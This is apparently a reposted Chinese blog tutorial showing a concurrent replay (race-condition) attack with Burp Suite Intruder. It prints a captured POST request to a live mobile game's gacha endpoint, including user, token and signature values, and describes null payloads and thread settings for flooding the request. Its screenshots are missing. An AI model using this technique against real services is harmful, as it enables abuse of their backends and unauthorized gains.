BurpSuite 並發重放攻擊示例


我們看看原始的請求send to Intruder后,他會自動給你設置postion,我的例子一共有10個,如下所示(攻擊的時候會將1-10的postion替換為空,而我要的效果是重放並發攻擊,所以后面去掉了$):

 

POST /ep108/gacha/play?p=§a§&mv=§1066§&id=§eb0b9fe3635d975610§&u=§626052202§&t=§1647141472§&lang=§Zh§ HTTP/1.1

Content-Type: application/json

Content-Length: 135

Host: gl-game.tsubasa-dreamteam.com

Connection: close

Accept-Encoding: gzip, deflate

User-Agent: okhttp/3.12.1

 

[{"gacha_product_info_id":§16481§,"play_count":§10§,"selected_category":§1§,"mixer_materials":[]},"§563b240f041a8be5280fb162a1448d56bbc6e30d§"]

 

 

然后攻擊的時候,clear 這些變量:

 

 

 

使用sniper攻擊,選擇null payloads:

 

 設置攻擊線程:

 

 

開始攻擊后的結果:

 

 

 

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM